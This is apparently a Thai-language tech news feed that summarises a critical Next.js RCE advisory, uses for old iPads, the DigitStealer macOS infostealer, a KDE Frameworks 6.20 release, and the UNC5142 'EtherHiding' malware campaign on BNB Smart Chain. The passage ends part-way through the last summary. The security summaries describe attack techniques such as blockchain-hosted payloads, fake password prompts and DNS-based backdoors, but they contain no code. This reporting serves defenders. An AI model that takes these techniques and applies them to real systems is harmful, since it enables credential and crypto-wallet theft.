• ช่องโหว่ Next.js ระดับวิกฤติ

    นักพัฒนาที่ใช้ Next.js ร่วมกับ React Server Components (RSC) กำลังเผชิญสถานการณ์อันตราย เนื่องจากมีการค้นพบช่องโหว่ที่เปิดโอกาสให้ผู้โจมตีสามารถส่งคำสั่งไปประมวลผลบนเซิร์ฟเวอร์โดยตรง ช่องโหว่นี้ถูกจัดอยู่ในระดับ CVSS 10.0 ซึ่งเป็นคะแนนสูงสุด หมายถึงความเสี่ยงต่อการถูกยึดครองระบบทั้งหมด

    สาเหตุของปัญหา
    ปัญหานี้เกิดจากการที่ RSC Protocol ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเข้มงวด ทำให้ผู้โจมตีสามารถสร้างคำขอที่บังคับให้เซิร์ฟเวอร์ทำงานตามเส้นทางที่ไม่ได้ตั้งใจไว้ ส่งผลให้เกิดการ Remote Code Execution (RCE) โดยตรง ซึ่งถือเป็นหนึ่งในช่องโหว่ที่อันตรายที่สุดในโลกเว็บแอปพลิเคชัน

    เวอร์ชันที่ได้รับผลกระทบ
    Next.js 15.x และ 16.x
    Next.js 14.3.0-canary.77 และเวอร์ชัน canary ที่ใหม่กว่า

    ในขณะที่ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ไม่ได้รับผลกระทบ

    แนวทางแก้ไข
    ไม่มีวิธีการตั้งค่าหรือ workaround ที่สามารถปิดช่องโหว่นี้ได้ ผู้พัฒนาจึงต้อง อัปเดตทันที ไปยังเวอร์ชันที่ได้รับการแก้ไข ได้แก่:
    Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7
    Next.js 16.0.7

    สำหรับผู้ที่ใช้เวอร์ชัน 14 Canary ควร downgrade กลับไปยังเวอร์ชัน stable ล่าสุดเพื่อความปลอดภัย

    สรุปประเด็นสำคัญ
    ข้อมูลจากข่าว
    ช่องโหว่ CVE-2025-66478 มีคะแนน CVSS 10.0
    เกิดจาก React Server Components (RSC) Protocol ที่ไม่ตรวจสอบข้อมูลเข้มงวด
    ส่งผลให้เกิด Remote Code Execution (RCE) ได้ทันที
    เวอร์ชันที่ได้รับผลกระทบคือ Next.js 15.x, 16.x และ 14.3.0-canary.77+
    เวอร์ชันที่ปลอดภัยคือ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime

    คำเตือนจากข่าว
    ไม่มี workaround หรือการตั้งค่าที่ช่วยแก้ไขได้
    หากไม่อัปเดตทันที ระบบเสี่ยงต่อการถูกยึดครองเต็มรูปแบบ
    ผู้ใช้ Next.js Canary ต้อง downgrade เพื่อหลีกเลี่ยงความเสี่ยง
    การละเลยการอัปเดตอาจทำให้ข้อมูลและระบบถูกโจมตีโดยตรง

    https://securityonline.info/maximum-severity-alert-critical-rce-flaw-hits-next-js-cve-2025-66478-cvss-10-0/
    ⚠️ ช่องโหว่ Next.js ระดับวิกฤติ นักพัฒนาที่ใช้ Next.js ร่วมกับ React Server Components (RSC) กำลังเผชิญสถานการณ์อันตราย เนื่องจากมีการค้นพบช่องโหว่ที่เปิดโอกาสให้ผู้โจมตีสามารถส่งคำสั่งไปประมวลผลบนเซิร์ฟเวอร์โดยตรง ช่องโหว่นี้ถูกจัดอยู่ในระดับ CVSS 10.0 ซึ่งเป็นคะแนนสูงสุด หมายถึงความเสี่ยงต่อการถูกยึดครองระบบทั้งหมด 🧩 สาเหตุของปัญหา ปัญหานี้เกิดจากการที่ RSC Protocol ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเข้มงวด ทำให้ผู้โจมตีสามารถสร้างคำขอที่บังคับให้เซิร์ฟเวอร์ทำงานตามเส้นทางที่ไม่ได้ตั้งใจไว้ ส่งผลให้เกิดการ Remote Code Execution (RCE) โดยตรง ซึ่งถือเป็นหนึ่งในช่องโหว่ที่อันตรายที่สุดในโลกเว็บแอปพลิเคชัน 🔎 เวอร์ชันที่ได้รับผลกระทบ 🐞 Next.js 15.x และ 16.x 🐞 Next.js 14.3.0-canary.77 และเวอร์ชัน canary ที่ใหม่กว่า ในขณะที่ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ไม่ได้รับผลกระทบ 🛡️ แนวทางแก้ไข ไม่มีวิธีการตั้งค่าหรือ workaround ที่สามารถปิดช่องโหว่นี้ได้ ผู้พัฒนาจึงต้อง อัปเดตทันที ไปยังเวอร์ชันที่ได้รับการแก้ไข ได้แก่: 🪛 Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 🪛 Next.js 16.0.7 สำหรับผู้ที่ใช้เวอร์ชัน 14 Canary ควร downgrade กลับไปยังเวอร์ชัน stable ล่าสุดเพื่อความปลอดภัย 📌 สรุปประเด็นสำคัญ ✅ ข้อมูลจากข่าว ➡️ ช่องโหว่ CVE-2025-66478 มีคะแนน CVSS 10.0 ➡️ เกิดจาก React Server Components (RSC) Protocol ที่ไม่ตรวจสอบข้อมูลเข้มงวด ➡️ ส่งผลให้เกิด Remote Code Execution (RCE) ได้ทันที ➡️ เวอร์ชันที่ได้รับผลกระทบคือ Next.js 15.x, 16.x และ 14.3.0-canary.77+ ➡️ เวอร์ชันที่ปลอดภัยคือ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ‼️ คำเตือนจากข่าว ⛔ ไม่มี workaround หรือการตั้งค่าที่ช่วยแก้ไขได้ ⛔ หากไม่อัปเดตทันที ระบบเสี่ยงต่อการถูกยึดครองเต็มรูปแบบ ⛔ ผู้ใช้ Next.js Canary ต้อง downgrade เพื่อหลีกเลี่ยงความเสี่ยง ⛔ การละเลยการอัปเดตอาจทำให้ข้อมูลและระบบถูกโจมตีโดยตรง https://securityonline.info/maximum-severity-alert-critical-rce-flaw-hits-next-js-cve-2025-66478-cvss-10-0/
    SECURITYONLINE.INFO
    Maximum Severity Alert: Critical RCE Flaw Hits Next.js (CVE-2025-66478, CVSS 10.0)
    Developers using the modern stack of Next.js and React are facing a “red alert” situation today. A maximum-severity
    0 ความคิดเห็น 0 การแบ่งปัน 38 มุมมอง 0 รีวิว
  • 5 วิธีใหม่ในการใช้ iPad รุ่นเก่าให้เกิดประโยชน์
    แม้ว่า iPad รุ่นใหม่จะมีประสิทธิภาพสูงและระบบ iPadOS ที่ทันสมัย แต่ iPad รุ่นเก่าก็ยังสามารถนำมาใช้งานได้อย่างคุ้มค่า โดย SlashGear ได้แนะนำ 5 วิธีใหม่ ที่ช่วยยืดอายุการใช้งานของอุปกรณ์และลดการสร้างขยะอิเล็กทรอนิกส์

    หนึ่งในวิธีที่น่าสนใจคือการใช้ iPad เป็น เมนูร้านอาหารหรือเครื่องคิดเงิน (POS) เพราะหน้าจอสามารถแสดงเมนูอาหารได้ชัดเจนและปรับเปลี่ยนได้ง่าย อีกทั้งยังรองรับแอปพลิเคชัน POS ที่ช่วยให้ร้านค้าประหยัดค่าใช้จ่ายในการซื้อเครื่องคิดเงินแบบดั้งเดิม

    อีกทางเลือกคือการใช้ iPad เป็น คอมพิวเตอร์สำรอง โดยเฉพาะรุ่นที่รองรับ iPadOS 26 ซึ่งมีฟีเจอร์ใกล้เคียงกับ MacBook เช่น การจัดการไฟล์และการทำงานแบบหลายหน้าต่าง ทำให้สามารถใช้แทนโน้ตบุ๊คได้ในกรณีฉุกเฉิน

    สำหรับผู้ที่ชอบปรับแต่งอุปกรณ์ iPad รุ่นเก่าสามารถ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัดของระบบ และติดตั้งแอปหรือฟีเจอร์ที่ Apple ไม่อนุญาต อย่างไรก็ตาม การเจลเบรกมีความเสี่ยงสูงและอาจทำให้หมดประกัน

    นอกจากนี้ยังสามารถใช้ iPad เป็น เครื่องช่วยออกกำลังกาย โดยเชื่อมต่อกับ Apple Fitness+ หรือใช้เป็นหน้าจอสำหรับดูวิดีโอการออกกำลังกาย และสุดท้ายคือการใช้เป็น เทเลพรอมพ์เตอร์ สำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ซึ่งมีแอปฟรีรองรับการใช้งานได้ทันที

    สรุปประเด็นสำคัญ
    รายการสิ่งที่ทำได้กับ iPad รุ่นเก่า
    เมนูร้านอาหาร / เครื่องคิดเงิน POS
    ใช้แสดงเมนูอาหารและเครื่องดื่ม
    รองรับแอป POS สำหรับการชำระเงิน

    คอมพิวเตอร์สำรองแทนโน้ตบุ๊ค
    ใช้ iPadOS 26 ที่รองรับ multitasking และจัดการไฟล์
    เหมาะสำหรับพกพาไปทำงานนอกสถานที่

    เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัด
    ติดตั้งแอปนอกระบบและปรับแต่งได้มากขึ้น
    ใช้เครื่องมืออย่าง palera1n สำหรับรุ่นที่รองรับ

    เครื่องช่วยออกกำลังกาย
    ใช้กับ Apple Fitness+ หรือวิดีโอออกกำลังกาย
    หน้าจอใหญ่และเสียงดังชัดเจนกว่ามือถือ

    เทเลพรอมพ์เตอร์ (Teleprompter)
    ใช้แอป Teleprompter หรือ Presenter Mode ใน Pages
    เหมาะสำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ

    คำเตือนและข้อควรพิจารณา
    แบตเตอรี่เสื่อมสภาพอาจทำให้ใช้งานต่อเนื่องได้ไม่นาน

    https://www.slashgear.com/2026270/more-things-you-can-do-with-old-ipad/
    📱5 วิธีใหม่ในการใช้ iPad รุ่นเก่าให้เกิดประโยชน์ แม้ว่า iPad รุ่นใหม่จะมีประสิทธิภาพสูงและระบบ iPadOS ที่ทันสมัย แต่ iPad รุ่นเก่าก็ยังสามารถนำมาใช้งานได้อย่างคุ้มค่า โดย SlashGear ได้แนะนำ 5 วิธีใหม่ ที่ช่วยยืดอายุการใช้งานของอุปกรณ์และลดการสร้างขยะอิเล็กทรอนิกส์ หนึ่งในวิธีที่น่าสนใจคือการใช้ iPad เป็น เมนูร้านอาหารหรือเครื่องคิดเงิน (POS) เพราะหน้าจอสามารถแสดงเมนูอาหารได้ชัดเจนและปรับเปลี่ยนได้ง่าย อีกทั้งยังรองรับแอปพลิเคชัน POS ที่ช่วยให้ร้านค้าประหยัดค่าใช้จ่ายในการซื้อเครื่องคิดเงินแบบดั้งเดิม อีกทางเลือกคือการใช้ iPad เป็น คอมพิวเตอร์สำรอง โดยเฉพาะรุ่นที่รองรับ iPadOS 26 ซึ่งมีฟีเจอร์ใกล้เคียงกับ MacBook เช่น การจัดการไฟล์และการทำงานแบบหลายหน้าต่าง ทำให้สามารถใช้แทนโน้ตบุ๊คได้ในกรณีฉุกเฉิน สำหรับผู้ที่ชอบปรับแต่งอุปกรณ์ iPad รุ่นเก่าสามารถ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัดของระบบ และติดตั้งแอปหรือฟีเจอร์ที่ Apple ไม่อนุญาต อย่างไรก็ตาม การเจลเบรกมีความเสี่ยงสูงและอาจทำให้หมดประกัน นอกจากนี้ยังสามารถใช้ iPad เป็น เครื่องช่วยออกกำลังกาย โดยเชื่อมต่อกับ Apple Fitness+ หรือใช้เป็นหน้าจอสำหรับดูวิดีโอการออกกำลังกาย และสุดท้ายคือการใช้เป็น เทเลพรอมพ์เตอร์ สำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ซึ่งมีแอปฟรีรองรับการใช้งานได้ทันที 📌 สรุปประเด็นสำคัญ 📋 รายการสิ่งที่ทำได้กับ iPad รุ่นเก่า ✅ เมนูร้านอาหาร / เครื่องคิดเงิน POS ➡️ ใช้แสดงเมนูอาหารและเครื่องดื่ม ➡️ รองรับแอป POS สำหรับการชำระเงิน ✅ คอมพิวเตอร์สำรองแทนโน้ตบุ๊ค ➡️ ใช้ iPadOS 26 ที่รองรับ multitasking และจัดการไฟล์ ➡️ เหมาะสำหรับพกพาไปทำงานนอกสถานที่ ✅ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัด ➡️ ติดตั้งแอปนอกระบบและปรับแต่งได้มากขึ้น ➡️ ใช้เครื่องมืออย่าง palera1n สำหรับรุ่นที่รองรับ ✅ เครื่องช่วยออกกำลังกาย ➡️ ใช้กับ Apple Fitness+ หรือวิดีโอออกกำลังกาย ➡️ หน้าจอใหญ่และเสียงดังชัดเจนกว่ามือถือ ✅ เทเลพรอมพ์เตอร์ (Teleprompter) ➡️ ใช้แอป Teleprompter หรือ Presenter Mode ใน Pages ➡️ เหมาะสำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ‼️ คำเตือนและข้อควรพิจารณา ⛔ แบตเตอรี่เสื่อมสภาพอาจทำให้ใช้งานต่อเนื่องได้ไม่นาน https://www.slashgear.com/2026270/more-things-you-can-do-with-old-ipad/
    WWW.SLASHGEAR.COM
    5 More Things You Can Do With Your Old iPad Instead Of Throwing It Away - SlashGear
    Old iPad gathering dust? Here’s how to turn it into a menu, teleprompter, workout screen, backup computer or more without spending much.
    0 ความคิดเห็น 0 การแบ่งปัน 238 มุมมอง 0 รีวิว
  • มัลแวร์ใหม่ DigitStealer โจมตี Mac รุ่น M2+

    Jamf Threat Labs เปิดเผยการค้นพบมัลแวร์ใหม่ชื่อ DigitStealer ที่ถูกออกแบบมาเพื่อเจาะระบบ macOS โดยเฉพาะรุ่นที่ใช้ชิป Apple Silicon M2 หรือใหม่กว่า จุดเด่นคือการใช้เทคนิคขั้นสูง เช่น multi-stage payload, JXA (JavaScript for Automation) และการซ่อนตัวผ่าน Cloudflare Pages เพื่อหลบเลี่ยงการตรวจจับ

    เป้าหมายหลัก: กระเป๋าเงินคริปโต Ledger Live
    หนึ่งในเป้าหมายสำคัญของ DigitStealer คือการแก้ไขและเปลี่ยนการตั้งค่าในแอป Ledger Live เพื่อส่งข้อมูล seed phrase และการตั้งค่ากระเป๋าเงินไปยังเซิร์ฟเวอร์ของผู้โจมตี มัลแวร์นี้ยังสามารถเข้าถึงข้อมูลจาก Electrum, Exodus, Coinomi และแม้แต่ macOS Keychain, VPN, Telegram ได้อีกด้วย

    เทคนิคการโจมตีที่ซับซ้อน
    DigitStealer ใช้การตรวจสอบฮาร์ดแวร์และ locale เพื่อตัดสินใจว่าจะทำงานหรือไม่ โดยมันจะไม่ทำงานบน VM, Intel Macs หรือแม้แต่ M1 Macs แต่จะทำงานเฉพาะบน M2 ขึ้นไป นอกจากนี้ยังใช้ AppleScript เพื่อหลอกให้ผู้ใช้กรอกรหัสผ่าน macOS และเก็บข้อมูล credential พร้อมทั้งสร้าง Launch Agent ที่ดึง payload จาก DNS TXT record เพื่อสร้าง backdoor ที่ทำงานต่อเนื่อง

    ความเสี่ยงและบทเรียน
    เหตุการณ์นี้สะท้อนให้เห็นว่าแม้ macOS จะถูกมองว่าปลอดภัย แต่ผู้โจมตีก็พัฒนาเทคนิคใหม่ๆ ที่เจาะจงไปยังสถาปัตยกรรมล่าสุดของ Apple ได้โดยตรง ผู้ใช้ที่เกี่ยวข้องกับคริปโตหรือข้อมูลสำคัญควรระวังเป็นพิเศษ และองค์กรควรเตรียมระบบตรวจจับภัยคุกคามที่ทันสมัยเพื่อรับมือกับมัลแวร์ที่ซับซ้อนเช่นนี้

    สรุปสาระสำคัญ
    การค้นพบมัลแวร์ DigitStealer
    เจาะระบบ macOS M2+ โดยใช้ JXA และ Cloudflare Pages
    ใช้ multi-stage payload เพื่อหลบเลี่ยงการตรวจจับ

    เป้าหมายการโจมตี
    มุ่งเป้าไปที่กระเป๋าเงินคริปโต Ledger Live
    สามารถเข้าถึงข้อมูลจาก Keychain, VPN, Telegram และ browser

    เทคนิคที่ใช้
    ตรวจสอบ locale และฮาร์ดแวร์เพื่อเลือกเป้าหมาย
    ใช้ AppleScript หลอกขอรหัสผ่าน macOS
    สร้าง Launch Agent ที่ดึง payload จาก DNS TXT record

    คำเตือนจากเหตุการณ์
    macOS ไม่ได้ปลอดภัยสมบูรณ์ ผู้โจมตีเริ่มเจาะจงรุ่นใหม่โดยตรง
    ผู้ใช้คริปโตควรระวังเป็นพิเศษ เนื่องจาก seed phrase อาจถูกขโมย
    องค์กรควรมีระบบตรวจจับภัยคุกคามที่ทันสมัยและแผนรับมือมัลแวร์ขั้นสูง

    https://securityonline.info/advanced-macos-digitstealer-targets-m2-macs-hijacking-ledger-live-via-jxa-and-dns-based-c2/
    🖥️ มัลแวร์ใหม่ DigitStealer โจมตี Mac รุ่น M2+ Jamf Threat Labs เปิดเผยการค้นพบมัลแวร์ใหม่ชื่อ DigitStealer ที่ถูกออกแบบมาเพื่อเจาะระบบ macOS โดยเฉพาะรุ่นที่ใช้ชิป Apple Silicon M2 หรือใหม่กว่า จุดเด่นคือการใช้เทคนิคขั้นสูง เช่น multi-stage payload, JXA (JavaScript for Automation) และการซ่อนตัวผ่าน Cloudflare Pages เพื่อหลบเลี่ยงการตรวจจับ 🔑 เป้าหมายหลัก: กระเป๋าเงินคริปโต Ledger Live หนึ่งในเป้าหมายสำคัญของ DigitStealer คือการแก้ไขและเปลี่ยนการตั้งค่าในแอป Ledger Live เพื่อส่งข้อมูล seed phrase และการตั้งค่ากระเป๋าเงินไปยังเซิร์ฟเวอร์ของผู้โจมตี มัลแวร์นี้ยังสามารถเข้าถึงข้อมูลจาก Electrum, Exodus, Coinomi และแม้แต่ macOS Keychain, VPN, Telegram ได้อีกด้วย 🛡️ เทคนิคการโจมตีที่ซับซ้อน DigitStealer ใช้การตรวจสอบฮาร์ดแวร์และ locale เพื่อตัดสินใจว่าจะทำงานหรือไม่ โดยมันจะไม่ทำงานบน VM, Intel Macs หรือแม้แต่ M1 Macs แต่จะทำงานเฉพาะบน M2 ขึ้นไป นอกจากนี้ยังใช้ AppleScript เพื่อหลอกให้ผู้ใช้กรอกรหัสผ่าน macOS และเก็บข้อมูล credential พร้อมทั้งสร้าง Launch Agent ที่ดึง payload จาก DNS TXT record เพื่อสร้าง backdoor ที่ทำงานต่อเนื่อง ⚠️ ความเสี่ยงและบทเรียน เหตุการณ์นี้สะท้อนให้เห็นว่าแม้ macOS จะถูกมองว่าปลอดภัย แต่ผู้โจมตีก็พัฒนาเทคนิคใหม่ๆ ที่เจาะจงไปยังสถาปัตยกรรมล่าสุดของ Apple ได้โดยตรง ผู้ใช้ที่เกี่ยวข้องกับคริปโตหรือข้อมูลสำคัญควรระวังเป็นพิเศษ และองค์กรควรเตรียมระบบตรวจจับภัยคุกคามที่ทันสมัยเพื่อรับมือกับมัลแวร์ที่ซับซ้อนเช่นนี้ 📌 สรุปสาระสำคัญ ✅ การค้นพบมัลแวร์ DigitStealer ➡️ เจาะระบบ macOS M2+ โดยใช้ JXA และ Cloudflare Pages ➡️ ใช้ multi-stage payload เพื่อหลบเลี่ยงการตรวจจับ ✅ เป้าหมายการโจมตี ➡️ มุ่งเป้าไปที่กระเป๋าเงินคริปโต Ledger Live ➡️ สามารถเข้าถึงข้อมูลจาก Keychain, VPN, Telegram และ browser ✅ เทคนิคที่ใช้ ➡️ ตรวจสอบ locale และฮาร์ดแวร์เพื่อเลือกเป้าหมาย ➡️ ใช้ AppleScript หลอกขอรหัสผ่าน macOS ➡️ สร้าง Launch Agent ที่ดึง payload จาก DNS TXT record ‼️ คำเตือนจากเหตุการณ์ ⛔ macOS ไม่ได้ปลอดภัยสมบูรณ์ ผู้โจมตีเริ่มเจาะจงรุ่นใหม่โดยตรง ⛔ ผู้ใช้คริปโตควรระวังเป็นพิเศษ เนื่องจาก seed phrase อาจถูกขโมย ⛔ องค์กรควรมีระบบตรวจจับภัยคุกคามที่ทันสมัยและแผนรับมือมัลแวร์ขั้นสูง https://securityonline.info/advanced-macos-digitstealer-targets-m2-macs-hijacking-ledger-live-via-jxa-and-dns-based-c2/
    SECURITYONLINE.INFO
    Advanced macOS DigitStealer Targets M2+ Macs, Hijacking Ledger Live via JXA and DNS-Based C2
    Jamf exposed DigitStealer, an advanced macOS infostealer that checks for Apple M2+ chips. It uses Cloudflare Pages for delivery, JXA for stealth, and modifies Ledger Live to steal crypto wallets via DNS TXT C2.
    0 ความคิดเห็น 0 การแบ่งปัน 179 มุมมอง 0 รีวิว
  • KDE Frameworks 6.20 เพิ่มแอนิเมชันใหม่ใน System Settings

    KDE Project ได้ปล่อย KDE Frameworks 6.20 ซึ่งเป็นการอัปเดตรายเดือนที่มาพร้อมกับการปรับปรุงหลายด้าน โดยหนึ่งในฟีเจอร์ที่โดดเด่นคือ แอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ทำให้การเปลี่ยนหน้าการตั้งค่าดูราบรื่นและทันสมัยมากขึ้น ช่วยเพิ่มประสบการณ์ผู้ใช้ให้มีความเป็นธรรมชาติและสอดคล้องกับการออกแบบ UI สมัยใหม่

    นอกจากนี้ยังมีการปรับปรุง KRunner ให้สามารถจัดเรียงผลลัพธ์การค้นหาได้อย่างคาดเดาและเรียนรู้ได้ง่ายขึ้น ซึ่งช่วยให้ผู้ใช้เข้าถึงฟังก์ชันหรือแอปที่ต้องการได้รวดเร็วขึ้น โดยเฉพาะผู้ใช้ที่พึ่งพาการค้นหาภายในระบบเป็นหลัก

    KDE Frameworks 6.20 ยังแก้ไขบั๊กหลายรายการ เช่น ปัญหาการแสดงผลใน System Settings เมื่อเปิดด้วย kcmshell6, การแก้ไข Crash ของ Plasma เมื่อเปลี่ยนธีม, และการแก้ไขปัญหาการทำงานของ Plasma Discover ที่ทำให้ผู้ใช้ถูกถาม Feedback ทุกครั้งที่เปิดใช้งาน นอกจากนี้ยังมีการปรับปรุง Breeze icon theme ให้รองรับภาษา RTL เช่น อาหรับและฮีบรู รวมถึงการแก้ไขการแสดงผลใน GTK apps

    การอัปเดตนี้ยังเพิ่มความเข้ากันได้กับ Dark Color Scheme, ปรับปรุงการจัดการไฟล์ใน Flatpak apps และแก้ไขปัญหาการทำงานกับ NFS share เพื่อให้ระบบมีความเสถียรและปลอดภัยมากขึ้น ถือเป็นการอัปเดตที่สำคัญสำหรับผู้ใช้ KDE Plasma และแอป KDE ทั่วไป

    สรุปประเด็นสำคัญ
    ฟีเจอร์ใหม่ใน KDE Frameworks 6.20
    เพิ่มแอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings
    ปรับปรุงการจัดเรียงผลลัพธ์ KRunner ให้คาดเดาได้ง่ายขึ้น

    การแก้ไขบั๊กและปรับปรุง
    แก้ Crash ของ Plasma เมื่อเปลี่ยนธีม
    แก้ปัญหา Plasma Discover ที่ถาม Feedback ทุกครั้ง
    ปรับปรุง Breeze icon theme สำหรับภาษา RTL

    การปรับปรุงความเข้ากันได้
    รองรับ Dark Color Scheme ได้ดียิ่งขึ้น
    แก้ไขการทำงานกับ Flatpak apps และ NFS share

    คำเตือนสำหรับผู้ใช้ KDE
    หากไม่อัปเดตเป็นเวอร์ชันล่าสุด อาจยังพบปัญหา Crash และบั๊กเดิม
    การละเลยการอัปเดตอาจทำให้ระบบไม่เสถียรและเสี่ยงต่อการทำงานผิดพลาด

    https://9to5linux.com/kde-frameworks-6-20-adds-a-fancier-push-pop-animation-to-system-settings-pages
    🎨 KDE Frameworks 6.20 เพิ่มแอนิเมชันใหม่ใน System Settings KDE Project ได้ปล่อย KDE Frameworks 6.20 ซึ่งเป็นการอัปเดตรายเดือนที่มาพร้อมกับการปรับปรุงหลายด้าน โดยหนึ่งในฟีเจอร์ที่โดดเด่นคือ แอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ทำให้การเปลี่ยนหน้าการตั้งค่าดูราบรื่นและทันสมัยมากขึ้น ช่วยเพิ่มประสบการณ์ผู้ใช้ให้มีความเป็นธรรมชาติและสอดคล้องกับการออกแบบ UI สมัยใหม่ นอกจากนี้ยังมีการปรับปรุง KRunner ให้สามารถจัดเรียงผลลัพธ์การค้นหาได้อย่างคาดเดาและเรียนรู้ได้ง่ายขึ้น ซึ่งช่วยให้ผู้ใช้เข้าถึงฟังก์ชันหรือแอปที่ต้องการได้รวดเร็วขึ้น โดยเฉพาะผู้ใช้ที่พึ่งพาการค้นหาภายในระบบเป็นหลัก KDE Frameworks 6.20 ยังแก้ไขบั๊กหลายรายการ เช่น ปัญหาการแสดงผลใน System Settings เมื่อเปิดด้วย kcmshell6, การแก้ไข Crash ของ Plasma เมื่อเปลี่ยนธีม, และการแก้ไขปัญหาการทำงานของ Plasma Discover ที่ทำให้ผู้ใช้ถูกถาม Feedback ทุกครั้งที่เปิดใช้งาน นอกจากนี้ยังมีการปรับปรุง Breeze icon theme ให้รองรับภาษา RTL เช่น อาหรับและฮีบรู รวมถึงการแก้ไขการแสดงผลใน GTK apps การอัปเดตนี้ยังเพิ่มความเข้ากันได้กับ Dark Color Scheme, ปรับปรุงการจัดการไฟล์ใน Flatpak apps และแก้ไขปัญหาการทำงานกับ NFS share เพื่อให้ระบบมีความเสถียรและปลอดภัยมากขึ้น ถือเป็นการอัปเดตที่สำคัญสำหรับผู้ใช้ KDE Plasma และแอป KDE ทั่วไป 📌 สรุปประเด็นสำคัญ ✅ ฟีเจอร์ใหม่ใน KDE Frameworks 6.20 ➡️ เพิ่มแอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ➡️ ปรับปรุงการจัดเรียงผลลัพธ์ KRunner ให้คาดเดาได้ง่ายขึ้น ✅ การแก้ไขบั๊กและปรับปรุง ➡️ แก้ Crash ของ Plasma เมื่อเปลี่ยนธีม ➡️ แก้ปัญหา Plasma Discover ที่ถาม Feedback ทุกครั้ง ➡️ ปรับปรุง Breeze icon theme สำหรับภาษา RTL ✅ การปรับปรุงความเข้ากันได้ ➡️ รองรับ Dark Color Scheme ได้ดียิ่งขึ้น ➡️ แก้ไขการทำงานกับ Flatpak apps และ NFS share ‼️ คำเตือนสำหรับผู้ใช้ KDE ⛔ หากไม่อัปเดตเป็นเวอร์ชันล่าสุด อาจยังพบปัญหา Crash และบั๊กเดิม ⛔ การละเลยการอัปเดตอาจทำให้ระบบไม่เสถียรและเสี่ยงต่อการทำงานผิดพลาด https://9to5linux.com/kde-frameworks-6-20-adds-a-fancier-push-pop-animation-to-system-settings-pages
    9TO5LINUX.COM
    KDE Frameworks 6.20 Adds a Fancier Push/Pop Animation to System Settings Pages - 9to5Linux
    KDE Frameworks 6.20 open-source software suite is out now with various improvements and bug fixes for KDE apps and the Plasma desktop.
    0 ความคิดเห็น 0 การแบ่งปัน 220 มุมมอง 0 รีวิว
  • “UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ — เมื่อบล็อกเชนกลายเป็นเครื่องมืออาชญากรรมไซเบอร์” — จาก WordPress สู่ Smart Contract: การโจมตีที่ล่องหนและยากจะหยุด

    รายงานร่วมจาก Mandiant และ Google Threat Intelligence Group (GTIG) เปิดเผยการโจมตีไซเบอร์รูปแบบใหม่โดยกลุ่ม UNC5142 ซึ่งใช้เทคนิค “EtherHiding” บน BNB Smart Chain เพื่อซ่อนและส่งมัลแวร์ผ่าน smart contracts โดยไม่ต้องใช้เซิร์ฟเวอร์แบบเดิม

    แทนที่จะโฮสต์มัลแวร์บนโดเมนหรือ IP ที่สามารถถูกบล็อกได้ UNC5142 ฝัง payload ไว้ใน smart contract ที่อยู่บนบล็อกเชน ซึ่งมีคุณสมบัติ “เปลี่ยนไม่ได้” และ “ลบไม่ได้” ทำให้การตรวจจับและการลบแทบเป็นไปไม่ได้

    มัลแวร์เริ่มต้นจากการฝัง JavaScript บนเว็บไซต์ WordPress ที่ถูกเจาะ ซึ่งโหลดตัวดาวน์โหลดชื่อ CLEARSHORT — ตัวนี้จะเชื่อมต่อกับ BNB Smart Chain ผ่าน Web3.js เพื่อดึงสคริปต์ถัดไปจาก smart contract และแสดงหน้าต่างหลอกลวง เช่น “อัปเดตระบบ” หรือ “ตรวจสอบความปลอดภัย” เพื่อหลอกให้ผู้ใช้คลิก

    ระบบ smart contract ที่ใช้มี 3 ชั้น:

    1️⃣ ชั้นแรก: ทำหน้าที่เป็น router ชี้ไปยัง contract ถัดไป

    2️⃣ ชั้นสอง: ทำ reconnaissance และ fingerprinting เหยื่อ

    3️⃣ ชั้นสาม: เก็บ URL ของ payload และคีย์ AES สำหรับถอดรหัส

    การอัปเดต payload หรือคีย์สามารถทำได้ด้วยธุรกรรมราคาถูก (ประมาณ $0.25–$1.50) โดยไม่ต้องเปลี่ยนโค้ดหลักของ contract — ทำให้ระบบมีความยืดหยุ่นสูงและต้นทุนต่ำ

    UNC5142 ยังใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing เช่น reCAPTCHA ปลอม, หน้าความเป็นส่วนตัวปลอม, และหน้าตรวจสอบ bot ปลอม ซึ่งหลอกผู้ใช้ให้คลิกและติดมัลแวร์

    มัลแวร์ที่ใช้มีหลายตัว เช่น:

    CLEARSHORT: JavaScript downloader
    VIDAR และ LUMMAC.V2: สำหรับ Windows
    RADTHIEF: ขโมย credentials
    ATOMIC: สำหรับ macOS — ใช้ bash script และ bypass quarantine

    กลุ่มนี้ยังมีโครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) เพื่อหลบเลี่ยงการถูกปิดระบบ และใช้ wallet ที่เชื่อมโยงกับ OKX exchange ในการจ่ายค่าธุรกรรม

    UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์
    ฝัง payload ใน smart contract ที่ลบไม่ได้

    เริ่มต้นจากเว็บไซต์ WordPress ที่ถูกเจาะ
    โหลด CLEARSHORT JavaScript downloader

    ใช้ Web3.js เชื่อมต่อกับ smart contract เพื่อดึง payload
    แสดงหน้าต่างหลอกลวงให้เหยื่อคลิก

    Smart contract มี 3 ชั้น: router → reconnaissance → payload
    อัปเดตได้ด้วยธุรกรรมราคาถูก

    ใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing
    เช่น reCAPTCHA ปลอม และหน้าตรวจสอบ bot

